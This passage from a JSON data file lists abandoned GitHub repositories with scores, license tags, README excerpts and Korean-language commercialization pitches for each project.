src=\"https://img.shields.io/npm/v/nuxt.svg?style=flat&colorA=18181B&colorB=28CF8D\" alt=\"Version\"></a>\n  <a href=\"https://www.npmjs.com/package/nuxt\"><img src=\"https://img.shields.io/npm/dm/nuxt.svg?style=flat&colorA=18181B&colorB=28CF8D\" alt=\"Downloads\"></a>\n  <a href=\"./LICENSE\"><img src=\"","composite_score":0.5397,"license_safety_tag":"unknown"},{"name":"scrapinghub/portia","github_url":"https://github.com/scrapinghub/portia","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":23,"description":"# Portia 저장소 분석\n\n## 왜 보물인가\n코딩 없이 웹사이트의 데이터를 자동으로 수집하는 도구로, 시간이 많이 걸리는 데이터 수집 작업을 손쉽게 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 경쟁사 가격 모니터링, 부동산 시세 추적, 구인공고 자동 수집 등을 제공하는 월 구독 서비스\n2. **내부 업무 도구**: 대","readme_excerpt":"Portia\n======\n\nPortia is a tool that allows you to visually scrape websites without any programming knowledge required. With Portia you can annotate a web page to identify the data you wish to extract, and Portia will understand based on these annotations how to scrape data from similar pages.\n\n# Running Portia\n\nThe easiest way to run Portia is using [Docker]:\n\nYou can run Portia using Docker & official Portia-image by running:\n\n    docker run -v ~/portia_projects:/app/data/projects:rw -p 9001:9001 scrapinghub/portia\n\nYou can also set up a local instance with [Docker-compose] by cloning this repo & running from the root of the folder:\n\n    docker-compose up\n\nFor more detailed instructions, and alternatives to using Docker, see the [Installation] docs.\n\n# Documentation\n\nDocumentation can be found from [Read the docs]. Source files can be found in the ``docs`` directory.\n\n[Docker]: https://www.docker.com/\n[Docker-compose]:https://docs.docker.com/compose\n[Installation]: http://portia.read","composite_score":0.5397,"license_safety_tag":"safe"},{"name":"Microsoft/ailab","github_url":"https://github.com/Microsoft/ailab","stars":7,"language":"C#","license":"MIT","abandonment_months":23,"description":"# Microsoft/ailab 분석 보고서\n\n## 왜 보물인가\n마이크로소프트가 직접 만든 AI 연구 프로젝트로, 최신 인공지능 기술을 상업화할 수 있는 기반을 갖추고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 기반 데이터 분석 플랫폼으로 기업의 의사결정을 돕는 웹 서비스\n2. **내부 업무 도구**: 대기업의 HR, 마케팅 ","readme_excerpt":"# Microsoft AI Lab\n## What is [AI Lab?](https://www.ailab.microsoft.com/experiments)\n\nAI Lab helps our large fast-growing community of developers get started on AI. You can experience, learn and code the latest and greatest innovations from Microsoft AI here. AI Lab currently houses eight projects that showcase the latest in custom vision, attnGAN, Visual Studio tools for AI, Cognitive Search, Machine Reading Comprehension and more. Each lab gives you access to the experimentation playground, source code on GitHub, a crisp developer-friendly video, and insights into the underlying developer/ organizational challenge and solution. \n\n<p align=\"center\">\n  <img width=\"560\" height=\"300\" src=\"https://github.com/Microsoft/ailab/blob/master/images/AI Lab.png\">\n</p>\n\nAI Lab is developed in partnership with Microsoft’s AI School and the Microsoft Research (MSR) AI organization.\n\n# Microsoft AI Lab Projects\n- [Spektacom \"Power Bat\"](https://www.ailab.microsoft.com/experiments/ce508ed3-cea9-41eb-a","composite_score":0.5397,"license_safety_tag":"safe"},{"name":"handong1587/handong1587.github.io","github_url":"https://github.com/handong1587/handong1587.github.io","stars":5,"language":"CSS","license":"MIT","abandonment_months":31,"description":"# handong1587/handong1587.github.io 분석\n\n## 왜 보물인가\n개인 블로그 또는 포트폴리오 웹사이트로, 누구나 쉽게 자신의 작업물을 인터넷에 공개할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **개인 포트폴리오 SaaS**: 개발자, 디자이너, 프리랜서가 구독하여 자신의 작품을 전시할 수 있는 웹사이트 빌더 서비","readme_excerpt":"This github blog theme is forked from [zJiaJun](https://github.com/zJiaJun).\n\nI use this repo to organise interesting papers, projects, websites, blogs and my reading/study notes.\n\nFeel free to send pull requests or open issues :-)\n","composite_score":0.5394,"license_safety_tag":"safe"},{"name":"trazyn/ieaseMusic","github_url":"https://github.com/trazyn/ieaseMusic","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":40,"description":"# ieaseMusic 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 음악을 듣고 관리할 수 있는 개인용 음악 플레이어 애플리케이션으로, 복잡한 기술 없이 실용적인 음악 감상 경험을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **음악 스트리밍 SaaS**: 개인 사용자를 위한 구독형 음악 감상 플랫폼으로 발전시켜 월정액 수익 모델 구축\n- **음악 큐레이션 ","readme_excerpt":"# ieaseMusic\n\n[![Current Release](https://img.shields.io/github/release/trazyn/ieaseMusic.svg?style=flat-square)](https://github.com/trazyn/ieaseMusic/releases)\n![License](https://img.shields.io/github/license/trazyn/ieaseMusic.svg?style=flat-square)\n[![Travis CI status](https://img.shields.io/travis/trazyn/ieaseMusic/dev.svg?style=flat-square)](https://travis-ci.org/trazyn/ieaseMusic/branches)\n[![Dependencies Status](https://david-dm.org/trazyn/ieaseMusic/status.svg?style=flat-square)](https://david-dm.org/trazyn/ieaseMusic)\n[![DevDependencies Status](https://david-dm.org/trazyn/ieaseMusic/dev-status.svg?style=flat-square)](https://david-dm.org/trazyn/ieaseMusic?type=dev)\n[![JS Standard Style](https://img.shields.io/badge/code%20style-standard-brightgreen.svg?style=flat-square)](http://standardjs.com)\n\n\n<img src=\"https://github.com/trazyn/ieaseMusic/blob/master/resource/128x128.png\" />\n\n> Elegant NeteaseMusic desktop app, Rock with NeteaseMusic :metal:\n\n> Built by Electron, React, Mob","composite_score":0.5393,"license_safety_tag":"safe"},{"name":"ethereum-boilerplate/ethereum-nft-marketplace-boilerplate","github_url":"https://github.com/ethereum-boilerplate/ethereum-nft-marketplace-boilerplate","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":29,"description":"# Ethereum NFT 마켓플레이스 보일러플레이트 분석\n\n## 왜 보물인가\n디지털 자산(NFT) 거래 플랫폼을 빠르게 만들 수 있는 완성된 기초 템플릿으로, 처음부터 개발하는 것보다 수개월의 개발 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 미술관이나 경매사가 자신의 디지털 작품 판매 플랫폼을 구축하고 월 구독료","readme_excerpt":"# `ethereum-boilerplate-NFT-Marketplace`\n\nThis Project is a fork of Ethereum Boilerplate and demostrates how you can build your own NFT Marketplace. This project of course work on any EVM-compatible blockchain such as Polygon, Avalanche, Binance Smart Chain and other such chains.\n\n![Preview](preview.gif)\n\n# ⭐️ `Star us`\nIf this boilerplate helps you build Ethereum dapps faster - please star this project, every star makes us very happy!\n\n# 🚀 Quick Start\n\n📄 Clone or fork `ethereum-nft-marketplace-boilerplate`:\n```sh\ngit clone https://github.com/ethereum-boilerplate/ethereum-nft-marketplace-boilerplate.git\n```\n💿 Install all dependencies:\n```sh\ncd ethereum-nft-marketplace-boilerplate\nyarn install \n```\n✏ Rename `.env.example` to `.env` in the main folder and provide your `appId` and `serverUrl` from Moralis ([How to start Moralis Server](https://docs.moralis.io/moralis-server/getting-started/create-a-moralis-server)) \nExample:\n```jsx\nREACT_APP_MORALIS_APPLICATION_ID = xxxxxxxxxxxx\nREACT_APP","composite_score":0.5393,"license_safety_tag":"safe"},{"name":"CrazyBotsz/Adv-Auto-Filter-Bot-V2","github_url":"https://github.com/CrazyBotsz/Adv-Auto-Filter-Bot-V2","stars":274,"language":"Python","license":"AGPL-3.0","abandonment_months":28,"description":"","readme_excerpt":"","composite_score":0.5392,"license_safety_tag":"risky"},{"name":"xiaoy-sec/Pentest_Note","github_url":"https://github.com/xiaoy-sec/Pentest_Note","stars":7,"language":"","license":"unknown","abandonment_months":37,"description":"# Pentest_Note 저장소 분석\n\n## 왜 보물인가\n보안 전문가들이 실제 침투 테스트 현장에서 사용하는 실용적인 팁과 기법들을 정리해놓은 자료이므로, 기업의 보안 취약점을 찾아내는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 SaaS**: 웹사이트나 네트워크의 약점을 자동으로 검사해주는 온라인 서비스로 제공\n2.","readme_excerpt":"* 公众号:关注安全技术\n* Author:小y\n* wiki:https://www.heresecurity.wiki/\n![image](https://github.com/xiaoy-sec/Pentest_Note/blob/master/img/wechat.png)\n# Pentest_Note\n\t查找内容请配合wiki食用或使用CTRL+F搜索\n\n  ## 主目录\n- [个人卫生](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/个人卫生.md)\n- [收集信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/README.md)\n- [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/README.md)\n- [防御规避](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/README.md)\n- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/README.md)\n- [文件操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/README.md)\n- [内网和域](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/README.md)\n- [HASH操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/README.md)\n- [横向移动](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/README.md)\n- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blo","composite_score":0.539,"license_safety_tag":"unknown"},{"name":"30-seconds/30-seconds-of-interviews","github_url":"https://github.com/30-seconds/30-seconds-of-interviews","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# 30-seconds-of-interviews 상업화 분석\n\n## 왜 보물인가\n취업 면접을 준비하는 사람들이 핵심 개념을 빠르게 학습할 수 있는 표준화된 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 취업준비생 대상 면접 코칭 플랫폼 - 월간 구독으로 최신 질문과 답변 제공\n2. **내부 업무 도구**: 대기업 인사팀의 ","readme_excerpt":"<a href=\"https://30secondsofinterviews.org\"><img src=\"logo.jpg\" alt=\"30 Seconds of Interviews logo\"></a>\n\n<h1 align=\"center\">\n  30 Seconds of Interviews\n</h1>\n\n<h4 align=\"center\">A curated collection of common interview questions to help you prepare for your next interview.</h4>\n\n<br>\n\n<p align=\"center\">\n    <a href=\"https://github.com/fejes713/30-seconds-of-interviews/blob/master/CONTRIBUTING.md\"><img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\" alt=\"PRs welcome\"></a>\n  <a href=\"https://travis-ci.com/30-seconds/30-seconds-of-interviews\"><img src=\"https://travis-ci.com/30-seconds/30-seconds-of-interviews.svg?token=uZrzJhwCxqfwx7TdXzc4&branch=master\" alt=\"travis\"></a>\n  <a href=\"https://www.producthunt.com/posts/30-seconds-of-interviews\"><img src=\"https://img.shields.io/badge/Product%20Hunt-vote-orange.svg\" alt=\"producthunt\"></a>\n  <a href=\"https://github.com/30-seconds/30-seconds-of-interviews/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/licence-MIT-blu","composite_score":0.5389,"license_safety_tag":"safe"},{"name":"EleutherAI/gpt-neo","github_url":"https://github.com/EleutherAI/gpt-neo","stars":5,"language":"Python","license":"MIT","abandonment_months":52,"description":"# GPT-Neo 저장소 분석\n\n## 왜 보물인가\n누구나 무료로 사용할 수 있는 강력한 인공지능 모델로, OpenAI의 GPT처럼 글을 쓰고 질문에 답할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 지원 챗봇 SaaS**: 기업의 자동 응답 시스템을 저렴하게 구축하여 월 구독료로 판매\n- **콘텐츠 작성 도구**: 블로그, 이메일, 광고 문구 자동","readme_excerpt":"# GPT Neo\n\n[![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.5297715.svg)](https://doi.org/10.5281/zenodo.5297715) [![arXiv](https://img.shields.io/badge/arXiv-2101.00027-f9f107.svg)](https://arxiv.org/abs/2101.00027)\n\n**As of August, 2021 code is no longer maintained. It is preserved here in archival form for people who wish to continue to use it.*\n\n🎉 1T or bust my dudes 🎉\n\nAn implementation of model & data parallel [GPT3](https://arxiv.org/abs/2005.14165)-like models using the [mesh-tensorflow](https://github.com/tensorflow/mesh) library.\n\n**If you're just here to play with our pre-trained models, we strongly recommend you try out the [HuggingFace Transformer integration](https://huggingface.co/EleutherAI).**\n\nTraining and inference is officially supported on TPU and should work on GPU as well. This repository will be (mostly) archived as we move focus to our GPU-specific repo, [GPT-NeoX](https://github.com/EleutherAI/gpt-neox/).\n\nIn addition to the functionality offered by GPT-3, ","composite_score":0.5386,"license_safety_tag":"safe"},{"name":"kakaobrain/fast-autoaugment","github_url":"https://github.com/kakaobrain/fast-autoaugment","stars":9,"language":"Python","license":"MIT","abandonment_months":60,"description":"","readme_excerpt":"# Fast AutoAugment **(Accepted at NeurIPS 2019)**\n\nOfficial [Fast AutoAugment](https://arxiv.org/abs/1905.00397) implementation in PyTorch.\n\n- Fast AutoAugment learns augmentation policies using a more efficient search strategy based on density matching.\n- Fast AutoAugment speeds up the search time by orders of magnitude while maintaining the comparable performances.\n\n<p align=\"center\">\n<img src=\"etc/search.jpg\" height=350>\n</p>\n\n## Results\n\n### CIFAR-10 / 100\n\nSearch : **3.5 GPU Hours (1428x faster than AutoAugment)**, WResNet-40x2 on Reduced CIFAR-10\n\n| Model(CIFAR-10)         | Baseline   | Cutout     | AutoAugment | Fast AutoAugment<br/>(transfer/direct) |   |\n|-------------------------|------------|------------|-------------|------------------|----|\n| Wide-ResNet-40-2        | 5.3        | 4.1        | 3.7         | 3.6 / 3.7        | [Download](https://arena.kakaocdn.net/brainrepo/fast-autoaugment/cifar10_wresnet40x2_top1_3.52.pth) |\n| Wide-ResNet-28-10       | 3.9        | 3.1  ","composite_score":0.5381,"license_safety_tag":"safe"},{"name":"husthuke/awesome-knowledge-graph","github_url":"https://github.com/husthuke/awesome-knowledge-graph","stars":12,"language":"","license":"unknown","abandonment_months":63,"description":"# Awesome Knowledge Graph 저장소 분석\n\n## 왜 보물인가\n복잡한 정보들을 체계적으로 정리하고 연결하는 기술 자료 모음으로, 인공지능이 더 똑똑해지는 기초가 됩니다.\n\n## 어디에 쓸 수 있나\n1. **검색 엔진 개선 SaaS**: 사용자 검색 결과를 더 정확하고 연관성 높게 제공하는 웹서비스\n2. **기업 내부 지식 관리 도구**: 직","readme_excerpt":"# awesome-knowledge-graph\n整理知识图谱相关学习资料，提供系统化的知识图谱学习路径。\n\n---\n\n## 目录\n- [理论及论文](#理论及论文)\n- [图谱及数据集](#图谱及数据集)\n- [工具及服务](#工具)\n- [白皮书及报告](#白皮书及报告)\n- [机构及人物](#机构及人物)\n- [视频课程](#视频课程)\n- [专栏合集](#专栏合集)\n- [评测竞赛](#评测竞赛)\n- [项目案例](#项目案例)\n- [推广技术文章](#推广技术文章)\n\n\n<!-- /MarkdownTOC -->\n## 理论及论文\n### 整体概念架构\n随着知识图谱的发展，与之相关的概念也越来越多，在阅读论文时先准确的把握该论文所要解决问题处于的层级或者位置对于更好的理解论文也比较有帮助，在此对知识图谱的概念进行了总结整理，整体概念架构图如下图所示，后面的论文分类也按照该整体架构概念图从顶向下，从整体到细节的方式组织。\n\n![image](https://github.com/husthuke/awesome-knowledge-graph/blob/master/image/framework.png)\n\n### 综述综合\n#### 大综述\n\n\n- [Knowledge Graph Construction Techniques](./paper/知识图谱构建技术综述_刘峤.caj)\n- [Review on Knowledge Graph Techniques (2016)](./paper/知识图谱技术综述.pdf)[一篇经典的中文综述，适合入门。]\n- [Reviews on Knowledge Graph Research (2017)](./paper/知识图谱研究综述-李涓子.pdf)[清华大学李娟子老师的综述，十分经典，对知识图谱走入大众视野功不可没。]\n- [The Research Advances of Knowledge Graph (2017)](./paper/知识图谱研究进展_漆桂林.caj)[东南大学漆桂林老师的综述，也是2017年发表的，同样对知识图谱走入大众视野起到很大作用。]\n- [A Survey on Knowledge Graphs: Representation, Acquisition and Applic","composite_score":0.538,"license_safety_tag":"unknown"},{"name":"PAIR-code/deeplearnjs","github_url":"https://github.com/PAIR-code/deeplearnjs","stars":7,"language":"TypeScript","license":"Apache-2.0","abandonment_months":83,"description":"# DeepLearnJS 보물 평가 분석\n\n## 왜 보물인가\n웹 브라우저에서 직접 인공지능을 실행할 수 있는 기술로, 별도의 프로그램 설치 없이 누구나 접근 가능한 민주화된 AI 경험을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n이미지 분석, 텍스트 분류, 음성 인식 등을 웹사이트에서 직접 제공하는 구독형 서비스 (예: 간단한 사","readme_excerpt":"# This repository has been archived in favor of tensorflow/tfjs.\n\nThis repo will remain around for some time to keep history but all future PRs should be sent to [tensorflow/tfjs](https://github.com/tensorflow/tfjs) inside the tfjs-core folder.\n\nAll history and contributions have been preserved in the monorepo.","composite_score":0.5374,"license_safety_tag":"safe"},{"name":"PerfectlySoft/Perfect","github_url":"https://github.com/PerfectlySoft/Perfect","stars":5,"language":"Swift","license":"Apache-2.0","abandonment_months":28,"description":"# Perfect 저장소 평가\n\n## 왜 보물인가\n웹과 모바일 애플리케이션을 빠르고 안정적으로 만들 수 있는 개발 틀이므로, 기술 회사들이 제품 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 업무 관리 플랫폼이나 협업 도구의 백엔드 기술로 활용\n- **내부 업무 도구**: 대기업의 직원 관리, 재고 ","readme_excerpt":"# Perfect: Server-Side Swift [简体中文](README.zh_CN.md)\n<p align=\"center\">\n    <a href=\"http://perfect.org/get-involved.html\" target=\"_blank\">\n        <img src=\"http://perfect.org/assets/github/perfect_github_2_0_0.jpg\" alt=\"Get Involed with Perfect!\" width=\"854\" />\n    </a>\n</p>\n\n<p align=\"center\">\n    <a href=\"https://developer.apple.com/swift/\" target=\"_blank\">\n        <img src=\"https://img.shields.io/badge/Swift-5.2-orange.svg?style=flat\" alt=\"Swift 5.2\">\n    </a>\n    <a href=\"https://developer.apple.com/swift/\" target=\"_blank\">\n        <img src=\"https://img.shields.io/badge/Platforms-OS%20X%20%7C%20Linux%20-lightgray.svg?style=flat\" alt=\"Platforms macOS | Linux\">\n    </a>\n    <a href=\"http://perfect.org/licensing.html\" target=\"_blank\">\n        <img src=\"https://img.shields.io/badge/License-Apache-lightgrey.svg?style=flat\" alt=\"License Apache\">\n    </a>\n</p>\n\n## Perfect: Server-Side Swift\n\nPerfect is a complete and powerful toolbox, framework, and application server for Linux, iOS, an","composite_score":0.5373,"license_safety_tag":"safe"},{"name":"casesandberg/react-color","github_url":"https://github.com/casesandberg/react-color","stars":5,"language":"JavaScript","license":"mit","abandonment_months":29,"description":"# react-color 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 원하는 색상을 쉽게 선택할 수 있는 인터페이스를 제공하는 도구로, 디자인 관련 서비스의 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 디자인 SaaS 플랫폼**\n캔바나 피그마처럼 사용자가 색상을 선택하고 저장하는 온라인 디자인 편집기에 내장할 수 있습니다.\n\n**2","readme_excerpt":"# [React Color](http://casesandberg.github.io/react-color/)\n\n[![Npm Version][npm-version-image]][npm-version-url]\n[![Build Status][travis-svg]][travis-url]\n[![License][license-image]][license-url]\n[![Downloads][downloads-image]][downloads-url]\n\n* **13 Different Pickers** - Sketch, Photoshop, Chrome and many more\n\n* **Make Your Own** - Use the building block components to make your own\n\n## Demo\n\n![Demo](https://media.giphy.com/media/26FfggT53qE304CwE/giphy.gif)\n\n[**Live Demo**](http://casesandberg.github.io/react-color/)\n\n## Installation & Usage\n\n```sh\nnpm install react-color --save\n```\n\n### Include the Component\n\n```js\nimport React from 'react'\nimport { SketchPicker } from 'react-color'\n\nclass Component extends React.Component {\n\n  render() {\n    return <SketchPicker />\n  }\n}\n```\nYou can import `AlphaPicker` `BlockPicker` `ChromePicker` `CirclePicker` `CompactPicker` `GithubPicker` `HuePicker` `MaterialPicker` `PhotoshopPicker` `SketchPicker` `SliderPicker` `SwatchesPicker` `TwitterPic","composite_score":0.5369,"license_safety_tag":"safe"},{"name":"Powerlevel9k/powerlevel9k","github_url":"https://github.com/Powerlevel9k/powerlevel9k","stars":7,"language":"Shell","license":"MIT","abandonment_months":74,"description":"# Powerlevel9k 평가 보고서\n\n## 왜 보물인가\n컴퓨터 화면의 검은 창(터미널)을 더 예쁘고 사용하기 편하게 만들어주는 도구로, 개발자들이 코딩할 때 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 개발환경 솔루션**: 클라우드 기반 개발 플랫폼에서 기본 테마로 통합하여 사용자 경험 향상\n2. **기업 IT 온보딩 ","readme_excerpt":"## Powerlevel9k is deprecated and now unmaintained. Please use [Powerlevel10k](https://github.com/romkatv/powerlevel10k)!\n---\n![](https://raw.githubusercontent.com/bhilburn/powerlevel9k-logo/master/logo-banner.png)\n---\n[![Build Status](https://travis-ci.org/bhilburn/powerlevel9k.svg?branch=master)](https://travis-ci.org/bhilburn/powerlevel9k)\n[![Join the chat at https://gitter.im/bhilburn/powerlevel9k](https://badges.gitter.im/bhilburn/powerlevel9k.svg)](https://gitter.im/bhilburn/powerlevel9k?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nPowerlevel9k is a theme for ZSH which uses [Powerline\nFonts](https://github.com/powerline/fonts). It can be used with vanilla ZSH or\nZSH frameworks such as [Oh-My-Zsh](https://github.com/robbyrussell/oh-my-zsh),\n[Prezto](https://github.com/sorin-ionescu/prezto),\n[Antigen](https://github.com/zsh-users/antigen), and [many\nothers](https://github.com/bhilburn/powerlevel9k/wiki/Install-Instructions).\n\nGet more out of your term","composite_score":0.5368,"license_safety_tag":"safe"},{"name":"snowpackjs/snowpack","github_url":"https://github.com/snowpackjs/snowpack","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":39,"description":"# Snowpack 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 작업 속도를 10배 이상 빠르게 할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 SaaS**: 개발자용 클라우드 IDE 플랫폼에 통합하여 빠른 프로토타이핑 환경 제공\n2. **내부 업무 도구**: 대기업 개발팀이 사내 웹 애플리케이션 개발 속도를 높이기 위","readme_excerpt":"> **Update (April 20, 2022):** Snowpack is no longer actively maintained and is not recommended for new projects.\n> \n> Check out [Vite](https://vitejs.dev/) for a well-maintained Snowpack alternative.  \n> See also: [esbuild](https://esbuild.github.io/), [parcel](https://parceljs.org/)\n\n<h1>Snowpack</h1>\n\nSnowpack is a lightning-fast frontend build tool, designed to leverage JavaScript's native module system (<a href=\"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import\">known as ESM</a>). It is an alternative to heavier, more complex bundlers like webpack or Parcel in your development workflow.\n\n### Key Features\n\n- Develop faster, with a dev server that starts up in **50ms or less.**\n- See changes reflected [instantly in the browser.](https://www.snowpack.dev/concepts/hot-module-replacement)\n- Integrate your favorite bundler for a [production-optimized build.](https://www.snowpack.dev/concepts/build-pipeline)\n- Enjoy out-of-the-box support for [TypeScript","composite_score":0.5367,"license_safety_tag":"safe"},{"name":"gregnb/mui-datatables","github_url":"https://github.com/gregnb/mui-datatables","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":25,"description":"# mui-datatables 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 대량의 데이터를 깔끔하게 정렬하고 검색할 수 있는 표 기능을 쉽게 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 구글 시트처럼 협업하는 데이터 관리 웹서비스의 핵심 표 기능\n2. **내부 업무 도구**: 회사 직원들이 사용하는 판매","readme_excerpt":"<div align=\"center\">\n  <img src=\"https://user-images.githubusercontent.com/19170080/34070522-e15d32e2-e235-11e7-8af5-fa704cdcad56.png\" />\n</div>\n\n# MUI-Datatables - Datatables for MUI (formerly Material-UI)\n\n[![Build Status](https://travis-ci.org/gregnb/mui-datatables.svg?branch=master)](https://travis-ci.org/gregnb/mui-datatables)\n[![NPM Downloads](https://img.shields.io/npm/dt/mui-datatables.svg?style=flat)](https://npmcharts.com/compare/mui-datatables?minimal=true)\n[![Coverage Status](https://coveralls.io/repos/github/gregnb/mui-datatables/badge.svg?branch=master)](https://coveralls.io/github/gregnb/mui-datatables?branch=master)\n[![npm version](https://badge.fury.io/js/mui-datatables.svg)](https://badge.fury.io/js/mui-datatables)\n\nMUI-Datatables is a responsive datatables component built on [Material-UI](https://www.material-ui.com).  It comes with features like filtering, [resizable columns](https://codesandbox.io/s/muidatatables-custom-toolbar-zomv5?file=/index.js), view/hide colu","composite_score":0.5367,"license_safety_tag":"safe"},{"name":"pikapkg/web","github_url":"https://github.com/pikapkg/web","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":39,"description":"# pikapkg/web 프로젝트 분석\n\n## 왜 보물인가\n사용자 친화적인 웹 인터페이스를 통해 패키지 관리를 간편하게 만든 도구로, 개발자들의 업무 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 소프트웨어 의존성을 온라인에서 직관적으로 관리할 수 있는 웹 플랫폼으로 운영\n2. **내부 업무 도구**: ","readme_excerpt":"> **Update (April 20, 2022):** Snowpack is no longer actively maintained and is not recommended for new projects.\n> \n> Check out [Vite](https://vitejs.dev/) for a well-maintained Snowpack alternative.  \n> See also: [esbuild](https://esbuild.github.io/), [parcel](https://parceljs.org/)\n\n<h1>Snowpack</h1>\n\nSnowpack is a lightning-fast frontend build tool, designed to leverage JavaScript's native module system (<a href=\"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import\">known as ESM</a>). It is an alternative to heavier, more complex bundlers like webpack or Parcel in your development workflow.\n\n### Key Features\n\n- Develop faster, with a dev server that starts up in **50ms or less.**\n- See changes reflected [instantly in the browser.](https://www.snowpack.dev/concepts/hot-module-replacement)\n- Integrate your favorite bundler for a [production-optimized build.](https://www.snowpack.dev/concepts/build-pipeline)\n- Enjoy out-of-the-box support for [TypeScript","composite_score":0.5366,"license_safety_tag":"safe"},{"name":"withastro/snowpack","github_url":"https://github.com/withastro/snowpack","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":39,"description":"# Snowpack 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 코드를 빠르게 준비해주는 도구로, 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **웹 개발 회사의 SaaS 서비스**: 고객사들이 자신의 웹사이트를 빠르게 구축하고 배포할 수 있는 클라우드 기반 개발 플랫폼으로 월 구독료 수금\n- **기업의 내","readme_excerpt":"> **Update (April 20, 2022):** Snowpack is no longer actively maintained and is not recommended for new projects.\n> \n> Check out [Vite](https://vitejs.dev/) for a well-maintained Snowpack alternative.  \n> See also: [esbuild](https://esbuild.github.io/), [parcel](https://parceljs.org/)\n\n<h1>Snowpack</h1>\n\nSnowpack is a lightning-fast frontend build tool, designed to leverage JavaScript's native module system (<a href=\"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import\">known as ESM</a>). It is an alternative to heavier, more complex bundlers like webpack or Parcel in your development workflow.\n\n### Key Features\n\n- Develop faster, with a dev server that starts up in **50ms or less.**\n- See changes reflected [instantly in the browser.](https://www.snowpack.dev/concepts/hot-module-replacement)\n- Integrate your favorite bundler for a [production-optimized build.](https://www.snowpack.dev/concepts/build-pipeline)\n- Enjoy out-of-the-box support for [TypeScript","composite_score":0.5366,"license_safety_tag":"safe"},{"name":"Tianxiaomo/pytorch-YOLOv4","github_url":"https://github.com/Tianxiaomo/pytorch-YOLOv4","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":24,"description":"# pytorch-YOLOv4 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 자동으로 찾아내는 인공지능 기술로, 보안 카메라부터 자율주행 자동차까지 다양한 산업에서 필수적으로 쓰이고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. CCTV 모니터링 SaaS**\n편의점·공장의 CCTV 영상을 자동 분석하여 위험 상황(사람 감지, 물체 도난 등)을 실시간 ","readme_excerpt":"# Pytorch-YOLOv4\n\n![](https://img.shields.io/static/v1?label=python&message=3.6|3.7&color=blue)\n![](https://img.shields.io/static/v1?label=pytorch&message=1.4&color=<COLOR>)\n[![](https://img.shields.io/static/v1?label=license&message=Apache2&color=green)](./License.txt)\n\nA minimal PyTorch implementation of YOLOv4.\n- Paper Yolo v4: https://arxiv.org/abs/2004.10934\n- Source code:https://github.com/AlexeyAB/darknet\n- More details: http://pjreddie.com/darknet/yolo/\n\n\n- [x] Inference\n- [x] Train\n    - [x] Mosaic\n\n```\n├── README.md\n├── dataset.py            dataset\n├── demo.py               demo to run pytorch --> tool/darknet2pytorch\n├── demo_darknet2onnx.py  tool to convert into onnx --> tool/darknet2pytorch\n├── demo_pytorch2onnx.py  tool to convert into onnx\n├── models.py             model for pytorch\n├── train.py              train models.py\n├── cfg.py                cfg.py for train\n├── cfg                   cfg --> darknet2pytorch\n├── data            \n├── weight                --> dark","composite_score":0.5364,"license_safety_tag":"safe"},{"name":"git-xuhao/KotlinMvp","github_url":"https://github.com/git-xuhao/KotlinMvp","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":72,"description":"# KotlinMvp 프로젝트 분석\n\n## 왜 보물인가\n안드로이드 앱을 깔끔하게 만들기 위한 설계 틀을 제공하는 재사용 가능한 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 회사의 내부 업무 도구**: 새로운 안드로이드 앱을 빠르게 